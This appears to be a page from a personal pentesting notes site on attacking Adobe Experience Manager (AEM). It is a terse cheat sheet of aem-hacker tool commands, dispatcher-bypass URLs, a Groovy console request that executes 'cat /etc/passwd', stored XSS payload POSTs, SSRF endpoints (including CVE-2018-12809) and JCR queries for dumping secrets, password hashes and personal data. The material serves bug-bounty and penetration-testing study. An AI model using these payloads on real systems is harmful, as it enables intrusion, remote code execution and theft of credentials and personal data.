Sec-88
  • 🧑Whoami
  • 🕸️Web-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
    • DNS Dangling / NS Takeover
  • ✉️API-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • 📱Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • 📶Network-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • 💻Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
    • Amazon Cognito Misconfiguraitons
  • 👨‍💻Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • 🖥️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
Powered by GitBook
On this page

Was this helpful?

Edit on GitHub
  1. Web-AppSec
  2. CMS

AEM [Adobe CMS]

PreviousCMSNextXSSI (Cross Site Script Inclusion)

Last updated 1 year ago

Was this helpful?

video

method

  • collect sub domain

  • use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem

  • Python3 ./aem_hacker.py –u — host localhost

  • use ../fuzzing/service/aem.txt to fuzz on path

aem tools

python3 aem_hacker.py    -u     --host yourvpshostname         =>comman usagepython3 aem_discovery.py --file urls.txt --workers 150         =>discover urlpython3 aem_enum.py      --url                                 => automate usernames and secrets grabbingpython3 aem_ssrf2rce.py  --url  --fakaem yourvbspython3 aem_server.py

aem dispatcher bypasses

<https://aemsite/bin/querybuilder.json>              => blocked<https://aemsite/bin/querybuilder.json/a.css>        => allow<https://aemsite/bin/querybuilder.json/a.html>       => allow<https://aemsite/bin/querybuilder.json/a.ico>        => allow<https://aemsite/bin/querybuilder.json/a.png>        => allow<https://aemsite/bin/querybuilder.json;%0aa.css>     => allow<https://aemsite/bin/querybuilder.json/a.1.json>     => allow
<https://aemsite/bin/querybuilder.json>              => blocked<https://aemsite/bin/querybuilder.json/a.css>        => block<https://aemsite/bin/querybuilder.json;%0aa.css>     => block<https://aemsite/bin/querybuilder.json.servlet.css>  => allow<https://aemsite/bin/querybuilder.json.servlet.html> => allow<https://aemsite/bin/querybuilder.json.servlet.ico>  => allow<https://aemsite/bin/querybuilder.json.servlet.png>  => allow///etc.json                 instead of  /etc.json///bin///quesrybuilder.json instead of  /bin/quesrybuilder.json
ssrf should allow to send GET request and see response- Opensocial proxy- ssrf in reportingservicesproxyservlet(cve-2018-12809)
POST /bin/groovyconsole/post.servlet HTTP/1.1HOST:script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt
POST //////content/usergenerated/etc/commerce/smartlists/vv.jsonaa=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b
POST /content/usergenerated/etc/commerce/smartlists/xssaaa.html=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b
POST /content/usergenerated/etc/commerce/smartlists/xssedjcr:data=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b&jcr:mimeType=text/html
everything is stored in jcr repository :- secrets (password  ,encryption key , tokens)- cinfiguration- pII- usernames** what to use **- DefaultGETServlet- QueryBUilderJsonServlet- QueryBuilderFeedServlet- GQLSearch Servlet- other** DefaultGETServlet **- Allows to get jsr node with its props- selectors  - tidy  - infinity  - numeric value:-1,0,1...99999- formats  - json  - xml  - res- <https://aem.site/tidy.3.json>  /    => jcr:root  tidy => selector tidy  3    => selector depth  json => output format- how to grap - get node names, start from jcr:root :    - /.1.json    - /.ext.json    - /.childrenlist.json - or guess node names :    - comman names /content, /home, /var, /etc - Dump props for each child node of jcr:root :    - /etc.json or /etc.s.json or /etc.-1.json- what to grap - interesting nodes    - /etc => may contain secrets (pass,enc,keys)    - /apps/system/config => passwords    - /apps/<smth>/config => passwords    - /var => may contain private pii    - /home => password hashed ,pii - interesting props-contain aem usernames    - jcr:createdBy    - jcr:lastModifiedBy    - cq:LastModifiedBy
- path   - /bin/querybuilder.json   - /bin/querybuilder.feed.servlet- examples of useful searches - type=nt:file&nodename=*.zip - path=/home&p.hits-full&p.limit=-1 - hasPermission=jcr:write&path=/content - hasPermission=jcr:addChild Nodes&path=/content - hasPermission=jcr:modify Properties&path=/content - p.hits-selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation-unequals&property.value=admin&type=nt%3abase&p.limit=1000 - path=/etc&path.flat=true&p.nodedepth=0 - path=/etc/replication/agents.author&p.hits-full&p.nodedepth=-1
ssrf via Opensocial proxy - /libs/opensocial/proxy?container=default&url=http://target - /libs/shindig/proxy?container=default&url=http://target
SSRF via ReportingServicesProxyServlet (CVE-2018-12809)- /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a- /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a- /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret-zzzz&redirect_uri=xxxx&code=eSSRF via SiteCatalystServlet- /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet- /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json
- /.ext.infinity.json- /.ext.infinity.json?tidy=true- /bin/querybuilder.json?type=nt:base&p.limit=-1- /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=- /content.assetsearch.json?query=*&start=0&limit=10&random=123- /..assetsearch.json?query=*&start=0&limit=10&random=123- /system/bgservlets/test.json?cycles-999999&interval=0&flushEvery=111111111
🕸️
https://www.youtube.com/watch?v=EQNBQCQMouk
https://example
https://github.com/0ang3el/aem-hacker
https://github.com/0ang3el/aem-rce-bundle